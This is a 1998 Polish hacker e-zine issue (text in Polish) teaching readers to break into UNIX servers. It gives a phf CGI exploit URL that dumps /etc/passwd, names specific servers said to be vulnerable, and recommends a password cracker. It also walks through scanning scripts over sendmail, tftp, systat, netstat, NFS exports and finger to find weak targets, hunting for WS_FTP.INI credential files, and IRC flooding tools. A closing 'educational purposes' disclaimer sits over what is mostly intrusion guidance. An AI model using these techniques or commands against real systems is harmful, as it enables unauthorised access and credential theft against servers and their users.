| | ---- ---- | / |--- |---\ /---\ |\ /| /--\ /-----
| | | | | | | / | | | | | \ / | / \ |
|----| |----| | |\ |-- |---/ \---\ | \/ | |----| | --\
| | | | | | | \ | | \ | | | | | | |
| | | | ---- | \ |--- | \ \---/ | | | | \----/
=============================================================================
Numer:03 z czerwca 1998 http://www.kki.net.pl/hackers
=============================================================================
Spis tresci:
1.Spis tresci
2.Wstep
3.Hacker Start
4.Zdobywanie wielu kont.
5.Skrypt!
6.Unix - polecenia cz.2
7.Linki do ciekawych stron
8.Redakcja
-----------------------------------------------------------------------------
Wstep:
Cos jakos tak ten mag wychodzi co 2 miesiace, choc powinien co miesiac. Do
tego numeru dolacze program opisywany w poprzednim numerze - "Kaboom!" .
Cos sie z nasza strona www dzieje, moze nawet za pol roku bedzie mozna uznac
ja za skonczona :) . W tym numerze bedzie duzo o UNIX-ie.
Kontakt przez email: hackers@kki.net.pl
Richgyver
ps. Napiszcie czy wolicie wersje tekstowa czy html-owska wersje maga!
-----------------------------------------------------------------------------
"Hacker Start":
Opisze tutaj dosc znany sposob wyciagniecia pliku passwd z katalogu etc w
systemach UNIX przez przegladarke internetowa z serverow podlaczonych do
internetu. Znajdujemy jakis serwer (komputer podlaczony bezposrednio do
internetu) a nastepnie wpisujemy w pole adresu:
http://xxxx.xxxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
^^^^^^^^^^^^^
tu adres servera
W tedy w przegladarce pojawi nam sie caly plik passwd, gdzie sa zapisane
hasla wszystkich uzytkownikow danego systemu. Oczywiscie sa one zaszyfrowane.
Rozszyfrowac je mozna programikiem o nazwie "Cracker Jack".
Ta metoda dziala juz na bardzo niewielu serwerach unixowych. W polsce ta
metoda dziala na:
http://www.radio.opole.com.pl
http://www.perytnet.pl
Richgyver
-----------------------------------------------------------------------------
ZDOBYWANIE WIELU KONT:
czesc 1: Tworzenie listy serwerow i wstepne zbieranie informacji...
Zaczne od tego, ze pisze ten artykul tylko po to, aby inni uzytkownicy
wiedzieli, ze mozliwe jest latwe zdobycie ich konta UNIXowego.
=============================================================================
OK., jest to pierwsza czesc mojego artykulu na temat hackowania
kont UNIXowych, wiec chcialbym napisac co wogole bedzie mozna
tu znalezc. Wiec tak, zamierzam opisac metody zdobywania adresow
serwerow i wyszukiwania tych slabo zabezpieczonych, dalej metody
chodzenia wokol systemu, zdobywania informacji o jego slabych
punktach, ktore mozna wykorzystac do wlamania. Nastepnie kilka
metod dostania sie do takiego serwera. Czytanie pliku /etc/shadow
z poziomu "szarego" uzytkownika, zdobywanie dalszych kont po
wlamaniu sie na serwer ( konie trojanskie, poszukiwanie bledow
w konfiguracji, itp. ). Moze bedzie cos jeszcze
( jesli mnie natchnie, lub znajde cos ciekawego w sieci :)
============================================================================
To zaczynam:
Najlatwiejszym sposobem wlamania sie do systemu jest wyszukanie
sobie kilku najslabiej zabezpieczonych serwerow i testowanie
roznych metod wlasnie na nich. Jest to tez chyba najbezpieczniejsze,
gdyz zakladam, ze skoro serwer jest slabo zabezpieczony, to jest
rowniez slabo monitorowany, co daje nam rowniez wieksze bezpieczenstwo.
Jak wyszukac sobie takie serwery? Otoz jest to bardzo proste.
Podam tu dwie najprostsze chyba metody:
1. Uruchamiamy wyszukiwarke internetowa ( np. www.wow.pl ),
wybieramy interesujacy nas dzial serwerow ( polecam edukacja/
szkoly, uczelnie, organizacje studenckie i tym podobny
shit :) Gdy pojawi sie spis serwerow zapisujemy go na dysk.
Kiedys wszystkie dzialy WOWa byly na plytce WWW ( np.
"WWW" sierpien 1997, mozna wiec zrobic to off-line oszczedzajac
kase ). Dalej wycinamy adresy serwerow ( recznie lub przy
uzyciu jakiegos programiku np. UrlCut, ktory dolaczam [ jest
to wersja 0.01 napisana w 15 min., wiec posiada duzo bledow,
ale obiecuje je wkrotce poprawic ] ). Majac juz liste serwerow
( jeden pod drugim ) mozemy rozpoczac scanning...
2. Druga metoda to sciagniecie gotowej listy serwerow z:
ftp.rs.internic.net
( sa tam: com.zone.gz, edu.zone.gz, gov.zone.gz, org.zone.gz,
root.zone.gz i inne ). Polecam edu lub org, jako najslabiej
zabezpieczone. Odradzam natomiast "zabawe" z gov.zone.gz
( szczegolnie poczatkujacym hackerom ). Po zrzuceniu pliki
te nalezy rozpakowac ( $ gzip -d edu.zone.gz lub pod WIN95
WinZip 6.3 [ moze inne tez] ). Dalej znow trzeba recznie
odzielic adresy od reszty danych ( mozna uzyc programiku
getdomain napisanego w perlu [ uruchamiamy go:
$ perl getdomain.pl edu.zone edu>lista ,lub dla org
$ perl getdomain.pl org.zone org>lista i analogicznie inne ]).
W najblizszym czasie postaram sie napisac podobne narzedzie
pod DOSa.
3. Mozna tez wykorzystac liste serwerow, ktora dodaje do
artykulow jest ona uzyskana wlasnie z WOW i obrobiona
programikiem UrlCut.
Dobra mamy juz liste serwerow. Teraz nalezaloby oddzielic
ziarna od plew. Zaczynamy od wstepnego przejrzenia podstawowych
dziur...
W tej czesci podam jedynie jak zdobywac rozne dane,
w czesci nastepnej postaram sie przedstawic wam ich analize
i doczego moga nam sie przydac zdobyte informacje.
a) SENDMAIL:
Zacznijmy moze od sprawdzenia wersji sendmaila na serwerze.
$ telnet adres.serwera.ofiary 25
powinno pojawic sie cos takiego:
...adres.serwera.edu.pl Sendmail 8.6.12/8.6.12 ready at...
Aby zrobic to automatycznie mozna uzyc programu SMSCAN,
uruchamiajac go ze stworzona wczesniej lista serwerow
( najpierw kompilujemy i zamieniamy nazwe :)
$ gcc smscan.c
$ mv a.out SMSCAN
i uruchamiamy:
$ ./SMSCAN lista>plik.z.wersjami.sendmaili&
Trwa to dosc dlugo, wiec najlepiej robic to albo noca,
albo polaczyc sie z jakims serwerem udostepniajacym
konta UNIXowe zrzucic tam SMSCAN i liste serwerow do
sprawdzenia a po uruchomieniu ( zostawic proces w tle
& lub nohup ) i wylogowac sie. Wyniki
mozna obejrzec wtedy np. nastepnego dnia.
Spisujemy numery wersji Sendmail'i ( potem nam sie przydadza ).
b) TFTP ( Trivial File Transfer Protocol ).
Sprawdzamy, czy serwery maja zaistalowanego klienta tftp:
$ telnet adres.serwera.ofiary 69
Jesli sie polaczy - notujemy to sobie, jesli nie - szukamy dalej.
Dzis juz bardzo trudno znalezc serwer odpowiadajacy na
takie zawolanie. Najczesciej zobaczycie napis:
telnet: Unable to connect to remote host: Connection refused
Mozna tez napisac script, ktory bedzie to robil za nas.
W najprostszej formie wygladalby tak:
$ cat script.tftp
telnet www.adres1.edu.pl 69
telnet www.adres2.edu.pl 69
telnet www.adres3.edu.pl 69
Tak robilem na poczatku, gdy jeszcze nie umialem napisac
bardziej skomplikowanego, lecz uniwersalnego scriptu.
Teraz wyglada on w ten sposob:
$ cat script.tftp
#!/bin/sh
for serwer in `cat $1`
do
telnet $serwer 69
done
$ :)
Uruchamiamy:
$ ./script.tftp lista.serwerow>raport.tftp
Przegladajac 'raport.tftp' wyszukujemy z jakimi serwerami polaczenie
sie powiodlo. Notujemy to sobie.
c) SYSTAT i NETSTAT.
Wykonujemy te same czynnosci, co powyzej, lecz zamiast portu 69
odpowiadajacego za TFTP podajemy 11 (systat) a nastepnie
15 (netstat). Sprawdzamy czy otrzymujemy odpowiedz z serwera
( czy porty te sa aktywne ). Jesli tak:
$ telnet www.adres.serwera 11>raport.systat&
Powinienes otrzymac liste procesow na serwerze ( tak jakbys wydal komende
ps -auwwx ), nie majac nawet na nim konta.
$ telnet www.adres.serwera 15>raport.netstat&
Zwroci Ci liste aktywnych portow serwera.
d) NFS, czyli Network File System.
Jest to chyba najfajniejsza rzecz jaka wymyslono. Admini ciagle
maja problemy z konfiguracja pliku /etc/exports.
Tworzymy wiec podobny script, z tym, ze zamiast telnetu wpisujemy
" showmount -e ".
----- wytnij tu ------
#!/bin/sh
for serwer in `cat $1`
do
showmount -e $serwer
done
----- wytnij tu ------
Na wiekszosci systemow potrzeba do tego roota.
# script.mount lista.serwerow>raport.mount&
Jednak juz w Red Hat Linux 5.00 moze to zrobic kazdy uzytkownik
( a taki system jest wlasnie na dom.vr.pl, gdzie mozna sobie
zalozyc darmowe konto ).
% script.mount lista.serwerow>raport.mount& ;)
e) FINGER.
Jest to rowniez bardzo pozyteczne narzedzie. Szczegolnie w wydaniu:
$ finger -l @www.adres.serwera
Zwroci nam to dane na temat pracujacych w systemie uzytkownikow.
Przydatne jest to szczegolnie przy probie dostania sie do
systemu poprzez odgadniecie hasla.
Znow tworzymy script, aby miec te informacje uwiecznione ( do pozniejszej
analizy ).
f) WWWBOARD.
O wwwboard bedzie wlasciwie pozniej, ale warto jest sie zorientowac,
czy serwer udostepnia takie uslugi ;)
$ lynx
Teraz naciskamy liere "g" i wpisujemy adres serwera:
URL to open: http://www.adres.serwera/wwwboard/wwwboard.html
Jesli odnajdzie szukana strone, notujemy. Nie - szukamy dalej.
[ Na temat hackowania wwwboard'a napisze w kolejnych czesciach
artykulu ]
g) WS_FTP.
Bardzo trudno jest dzis znalezc plik WS_FTP.INI z aktualnym
wpisem, ale jesli Ci sie to uda to koniecznie zapisz to sobie.
Jak go znalezc?
Najlepiej polaczyc sie z serwerem za pomoca anonimowego ftp
i szukac :) Gdy znajdziemy, to:
ftp> get WS_FTP.INI
[ Szerzej na temat WS_FTP napisze w dalszych czesciach artykulu ]
h) Dziury w scriptach CGI-BIN w starszych HTTPD.
Pod katem tego typu dziur mozna przeszukiwac serwery wykorzystujac
program ( a raczej kilka scriptow ) XENOLITH i wczesniej
stworzona liste. Do artykulu zalaczam script z tego pakietu o
nazwie monk.sh
Uzycie:
$ ./monk.sh lista.serwerow
Podczas skanowania tworzy on pliki o nazwie powstalej z adresu
serwera, w ktorych zapisuje sciagniety plik z haslami
( pod warunkiem, ze go sciagnie, co dzis nie jest juz takie proste :(
W celu przeskanowania pojedynczego serwera korzystam ze swietnego
programiku o nazwie Vito. Dolacze go do nastepnego artykulu, w ktorym
dokladniej opisze te dziury.
=============================================================================
OK. tyle na dzisiaj. Wiecej w nastepnym numerze, w ktorym postaram
sie wytlumaczyc wam w jaki sposob interpretowac zdobyte informacje,
oraz jak z nich korzystac.
=============================================================================
ArktH
ps. Pozdrowienia dla: KeenU'a, Sir D, BoBo, 3stan'a i pozostalych.
" Nil mortalibus ardui (e)st... " - Horacy
mail: arkth@friko4.onet.pl
flames: /dev/null
-----------------------------------------------------------------------------
Skrypt!:
Jak to mawiał kiedyś pan Japa WITKA (kto nie rozumie to nie zrozumie).W
każdym bądź razie to znowu JA. Hmmm znowu kazali mi cos napisać ale nie
powiedzieli co. Uwazam ze każdy z was ma mIRC-a (internet realy chat) ale
jeśli nie to załączam go tutaj. Jego instalacja jest banalna wiec nie będę
jej opisywal. Może nie raz będąc na ircu usłyszeliście cos o skryptach czy
to wojennych obronnych czy może uniwersalnych. Właśnie to o nich chce
powiedzieć co nieco. Niektórych stron możecie ściągnąć jakiegoś scrypta np.
http://www.7thsphere.com/sphere/files/sphere.exe i jest on jednym z lepszych
scryptow wojennych. Jest on w pliku zip lub wersji instalacyjnej. Po
ściągnięciu rozpakujcie go do katalogu w którym macie zainstalowanego Mirca.
Po włączeniu może pojawić się kłopot z setupem. Wpiszcie co tam chcą a jeśli
będziecie mieli kłopocik to po prostu trzeba wcisnąć cancel. I właściwie to
wszystko jeśli chodzi o instalacje. Po włączeniu musicie od początku wpisać
swoje dane i kanał ircowy. Zaraz po połączeniu zobaczycie zmiany. Po
pierwsze pojawiły się dźwięki. Wszystko wyświetlane jest w oknach. W pasku
opcji pojawiła się nowa 7sphere. Jest tam wiele opcji m.in. można ustawić
sobie ochronę różnego rodzaju np. przed floodem. Możemy zapisywać logi by
potem sobie poczytać lub sprawdzić co kto mówił. Ważną opcją jest przejście
do War Menu. Mamy wtedy dostęp do kilku programów do banowania, floodowania
i różnych takich:):):):):)(r)Dużo opcji jest dostępnych dopiero gdy mamy opa
(operator kanału).
Lukas
-----------------------------------------------------------------------------
Unix - polecenia czesc II :
Zdobywanie informacji o innych użytkownikach:
-Sprawdź co użytkownik robi - w "nazwa_użytkownika"
-Sprawdź co użytkownik ostatnio robił - lastcomm "nazwa_uzytkownika"
-Sprawdź porę zalogowania się/wylogowania - last "nazwa_użytkownika"
-Wyświetlanie praw dostępu w katalogu macierzystym użytkownika
- ls -ld ~"nazwa użytkownika"
Prawa dostępu do plików i katalogów w UNIX:
-Sprawdź prawa dostępu do pliku - ls -l nazwa_pliku
-Sprawdź prawa dostępu do katalogu - ls -ld nazwa_pliku
-Sprawdź prawa dostępu w swoim katalogu macierzystym
- ls -ld ~"twoja_nazwa_użytkownika"
Prawa dostępu (lewa część wykazu) będą podane następująco:
-rxw-------- 2 aaron 512 Feb 17 08:14 nazwa_pliku
gdzie symbole mają następujące znaczenie:
d - katalog
rwx (pierwsze) - prawa dostępu dla użytkownika (Ciebie)
rwx (drugie) - prawa dostępu dla członków twojej grupy
rwx (trzecie) - prawa dostępu dla innych (pozostałych)
w każdej kategorii -użytkownik członkowie_grupy inni
Symbol oznacza:
R - zezwolenie na odczyt (kopiowanie, wyświetlanie, ściąganie)
W - zezwolenie na zapis (zmiana nazwy, modyfikowanie, kasowanie)
X - zezwolenie na uruchomienie pliku
- - brak danego zezwolenia
Prawa dostępu możesz zmienić poleceniem CHMOD. Trzeba w nim wskazać kategorię
(u- użytkownik, g- członkowie grupy, o- inni,) oraz które zezwolenie (rwx)
ma być włączone (+) lub wyłączone (-) Parametry mogą być kombinowane np.
Chmod o-rw nazwa_uzytkownika - wyłączy zezwolenie na zapis i na odczyt dla
innych
Chmod u+x nazwa_uzytkownika - włączy zezwolenie na uruchamianie dla
użytkownika
Lukas
-----------------------------------------------------------------------------
Linki do interesujacycg stron:
-strony zwiazane z h/p/c/v/a
-http://www.kki.net.pl/hackers
-http://www.inet.com.pl/rafal
-http://hack.netpol.pl
-http://kki.net.pl/glider
-http://www.kki.net.pl/~masher
Twoja strona tez moze znalezc sie w tym spisie. Musisz najpierw:
1. Umiescic ten "kawalek" kodu html na swojej stronie:
<-- Poczatek odnosnika do hackersmag -->
<-- Koniec odnosnika -->
2. Napisac do nas email (zadresowany do hackers@kki.net.pl) z informacja
o adresie twojej strony.
Jesli wszystko zrobiles poprawnie twoja strona zostanie umieszczona w naszym
spisie najciekawszych stron.
-----------------------------------------------------------------------------
W sklad redakcja tego maga wchodza:
-Richgyver (hackers@kki.net.pl)
-Lukas (chopin@friko.onet.pl)
-ArtktH (arkth@friko4.onet.pl)
Jesli chcial cos napisac do naszego maga (a nam to sie by spodobalo)
lub napisales juz jakis tekst to wyslij to na adres: hackers@kki.net.pl
ze swoimi danymi. Kazdy taki piszacy do naszego maga dostanie wynagrodzenie
(pieniadze).
Zawsze wszystkie numery poprzednie oraz najnowszy numer naszego magazynu
mozesz sciagnac ze strony: http://www.kki.net.pl/hackers
Mozesz do nas napisac list, nasz email: hackers@kki.net.pl
Wszystkie materialy i informacje zawarte sa tu jedynie w celach
*EDUKACYJNYCH* i nikt z redakcji nie ponosi *ZADNEJ* odpowiedzialnosci, za
zle wykorzystanie podanych tu informacji...
/Koniec pliku tekstowego./